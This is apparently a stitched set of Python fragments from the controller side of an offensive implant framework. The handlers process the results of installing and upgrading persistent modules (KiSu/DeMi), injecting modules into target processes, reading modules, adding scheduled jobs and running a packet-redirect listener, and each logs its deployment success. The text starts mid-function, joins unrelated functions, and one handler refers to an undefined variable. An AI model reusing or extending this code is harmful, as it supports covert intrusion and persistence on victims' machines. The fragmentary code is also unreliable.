'true') else: sub.AddAttribute('permanent', 'false') output.RecordXml(xml) if action == 'Load' and hive.permanent == False: output.GoToBackground() output.End() return True
def _handleProcessLoad(namespace, output, msg): result = ResultProcessLoad() result.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('KiSuProcessLoad') xml.AddAttribute('instance', '0x%08x' % result.instance) xml.AddAttribute('processId', '%u' % result.processId) output.RecordXml(xml) import mcl.tools verInfo = mcl.tools.GetVersion('DeMi') if verInfo != None: mcl.tools.RecordUsage( 'DeMi', verInfo['full'], mcl.tools.USAGE_FLAG_EXERCISED, mcl.tools.USAGE_STATUS_SUCCESSFUL, comments='Modules loaded into process %u from 0x%08x' % (result.processId, result.instance)) return mcl.target.CALL_SUCCEEDED
def _handleSchedulerAdd(output, msg): if msg.GetCount() == 0: output.RecordError('No data returned') output.EndWithStatus(mcl.target.CALL_FAILED) return True results = ResultAdd() results.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('NewJob') try: jobId = int(results.jobId) except: jobId = 0 xml.AddAttribute('id', '%u' % jobId) xml.AddAttribute('name', results.jobId) output.RecordXml(xml) output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True
def TaskingMain(namespace): import mcl.imports import mcl.target import mcl.tasking import mcl.tasking.resource mcl.imports.ImportWithNamespace(namespace, 'mca.network.cmd.packetredirect', globals()) mcl.imports.ImportWithNamespace(namespace, 'mca.network.cmd.packetredirect.tasking', globals()) lpParams = mcl.tasking.GetParameters() tgtParams = mca.network.cmd.packetredirect.Params() if lpParams['driverName'] != None: tgtParams.extraInfo = lpParams['driverName'] if len(tgtParams.extraInfo) == 0: tgtParams.extraInfo = mcl.tasking.resource.GetName('DmGz') if lpParams['sendType'] == CMD_SEND_TYPE_DRIVER: tgtParams.sendType = mca.network.cmd.packetredirect.PARAMS_SEND_TYPE_DRIVER elif lpParams['sendType'] == CMD_SEND_TYPE_RAW: tgtParams.sendType = mca.network.cmd.packetredirect.PARAMS_SEND_TYPE_RAW else: mcl.tasking.OutputError('Invalid send type') return False listenSock = _openListenSocket(lpParams['listenport'], lpParams['bindAddr']) try: addr = listenSock.getsockname() from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('LocalSocket') xml.AddAttribute('port', '%u' % addr[1]) xml.AddAttribute('address', addr[0]) mcl.tasking.OutputXml(xml) mcl.tasking.TaskGoToBackground() return _packetRedirectHandler(mca, listenSock, tgtParams) finally: listenSock.close() return
def _handleUpgrade(namespace, output, msg): result = ResultUpgrade() result.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('KiSuUpgrade') xml.AddAttribute('id', '0x%08x' % result.instance) import mcl.imports mcl.imports.ImportWithNamespace(namespace, 'mcf.kisu.ids', globals()) for name in mcf.kisu.ids.nameTable: if mcf.kisu.ids.nameTable[name] == result.instance: xml.AddAttribute('name', name) break while msg.PeekByKey(MSG_KEY_RESULT_MODULE) != None: module = ResultModule() module.Demarshal(msg) sub = xml.AddSubElement('Module') sub.AddAttribute('size', '%u' % module.size) sub.AddAttribute('order', '%u' % module.order) sub.AddAttribute('flags', '0x%08x' % module.flags) sub.AddAttribute('id', '0x%08x' % module.id) sub.AddAttribute('moduleName', module.moduleName) sub.AddAttribute('processName', module.processName) sub.AddAttribute('actionStatus', '0x%08x' % module.actionStatus) if len(module.hash) > 0: hashSub = sub.AddSubElement('Sha1Hash') hashSub.SetTextAsData(module.hash) output.RecordXml(xml) import mcl.tools verInfo = mcl.tools.GetVersion('DeMi') if verInfo != None: mcl.tools.RecordUsage('DeMi', verInfo['full'], mcl.tools.USAGE_FLAG_DEPLOYED, mcl.tools.USAGE_STATUS_SUCCESSFUL, comments='Upgraded 0x%08x' % result.instance) return mcl.target.CALL_SUCCEEDED
def _handleModuleRead(namespace, output, msg): import os.path result = ResultModuleRead() result.Demarshal(msg) f, path, logName = output.CreateLogFile(prefix='demi', suffix='get', subDir='DemiOutput', utf8=False) if f == None: output.RecordError('Failed to create log file for 0x%08x' % results.id) return mcl.target.CALL_FAILED else: try: f.write(result.data) f.flush() finally: f.close() from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('KiSuReadModuleSuccess') xml.AddAttribute('id', '0x%08x' % result.id) xml.AddAttribute('instance', '0x%08x' % result.instance) xml.AddAttribute('bytes', '%u' % len(result.data)) xml.SetText(os.path.normpath('%s/%s' % (path, logName))) output.RecordXml(xml) import mcl.tools verInfo = mcl.tools.GetVersion('DeMi') if verInfo != None: mcl.tools.RecordUsage('DeMi', verInfo['full'], mcl.tools.USAGE_FLAG_EXERCISED, mcl.tools.USAGE_STATUS_SUCCESSFUL, comments='Read module 0x%08x to 0x%08x' % (result.id, result.instance)) return mcl.target.CALL_SUCCEEDED
def _handleInstall(namespace, output, msg): result = ResultInstall() result.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('KiSuInstall') xml.AddAttribute('id', '0x%08x' % result.instance) import mcl.imports mcl.imports.ImportWithNamespace(namespace, 'mcf.kisu.ids', globals()) for name in mcf.kisu.ids.nameTable: if mcf.kisu.ids.nameTable[name] == result.instance: xml.AddAttribute('name', name) break output.RecordXml(xml) import mcl.tools verInfo = mcl.tools.GetVersion('DeMi') if verInfo != None: mcl.tools.RecordUsage('DeMi', verInfo['full'], mcl.tools.USAGE_FLAG_DEPLOYED, mcl.tools.USAGE_STATUS_SUCCESSFUL, comments='Installed 0x%08x' % result.instance) return mcl.target.CALL_SUCCEEDED
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.status.cmd.memory', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('Memory', 'memory', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True results = Result() results.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Memory') physicalLoad = 100 - 100 * (float(results.physicalAvail) / float(results.physicalTotal)) xml.AddAttribute('physicalLoad', '%u' % int(physicalLoad)) sub = xml.AddSubElement('Physical') sub.AddAttribute('total', '%u' % results.physicalTotal) sub.AddAttribute('available', '%u' % results.physicalAvail) sub = xml.AddSubElement('Page') sub.AddAttribute('total', '%u' % results.pageTotal) sub.AddAttribute('available', '%u' % results.pageAvail) if results.virtualTotal > 0: sub = xml.AddSubElement('Virtual') sub.AddAttribute('total', '%u' % results.virtualTotal) sub.AddAttribute('available', '%u' % results.virtualAvail) output.RecordXml(xml) output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True